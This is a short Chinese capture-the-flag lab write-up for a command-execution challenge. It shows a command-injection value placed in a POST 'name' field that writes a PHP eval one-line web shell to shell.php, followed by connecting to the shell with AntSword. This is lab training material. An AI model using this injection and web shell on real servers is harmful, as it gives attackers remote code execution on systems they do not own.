命令执行:命令执行01

靶场地址:http://whalwl.xyz:8033/

解题准备:BP抓包,了解linux基本解压命令

解题思路:

1、BP抓包,替换POST中name的值

backup.tar.gz;echo '<?php @eval($_POST["x"]); ?>' >shell.php

命令执行:命令执行01

 2、成功上传

命令执行:命令执行01

 3、使用蚁剑连接        http://whalwl.xyz:8033/shell.php 密码为 x

命令执行:命令执行01

 

 

上一篇:一些重要的非常棒的畅游宇宙的网站


下一篇:计算不同色域下的RGB与YUV 以及 RGB与XYZ互转公式